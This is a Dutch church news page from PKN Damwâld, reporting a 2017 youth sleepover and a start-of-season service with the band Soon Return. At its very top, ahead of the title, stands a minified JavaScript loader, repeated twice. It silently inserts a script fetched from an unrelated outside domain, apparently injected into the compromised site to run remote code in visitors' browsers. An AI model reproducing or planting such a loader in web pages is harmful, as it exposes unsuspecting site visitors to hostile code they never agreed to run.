;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Open Huis ... mooie start van het kerkelijk seizoen! - PKN Damwâld

Open Huis … mooie start van het kerkelijk seizoen!

Gepubliceerd op: maandag 18 september 2017

Als het enthousiasme in het startweekend ook maar half de opmaat was voor het komende winterwerk in Damwâld, dan belooft het komende seizoen er heel b(l)oeiend uit te gaan zien. Afgelopen zaterdag toog de jeugd van de Doopsgezinde en beide PKN-kerken uit Damwâld naar de familie Kingma in Damwâld. Getooid met slaapgerei en wat al niet meer toverden de deelnemers de ‘Kingma-residentie’ om tot een ware belevenis. Eén ‘die-hard’ liet zich niet van de wijs brengen en overnachtte ondanks het ‘petweer’ in een waterbestendig tentje. De start van de Damwâlder Open Huis was daarmee een feit ! En de stemming zat er meteen al goed in. Gezellige deelnemers, veel hilariteit, een fantastische sfeer … en met uiteraard de geweldige dank en complimenten aan de familie Kingma ! Hoogtepunten waren naast een perfecte b.b.q. wel de ‘ duistere speurtocht’ in en rond Damwâld.
Na het ontbijt op de zondagmorgen werd het programma in alle hevigheid voortgezet. Ietje Hinke de Boer, pastor van de Doopsgezinde kerk in Damwâld en gospelband Soon Return zorgden in een bomvolle kerk de Ontmoeting in Damwâld voor een aanstekelijke startdienst. Het startthema ‘Open Huis’ werd daarin gekoppeld aan het altijd boeiende verhaal van de tollenaar Zacheüs, die zijn huis openstelde voor Jezus en uiteraard was het optreden van Soon Return weer fenomenaal! De lekkere frisse sound in combinatie met de verzorgde, heldere zang en teksten zorgden bij menigéén voor geregelde ‘kippenvelmomenten’.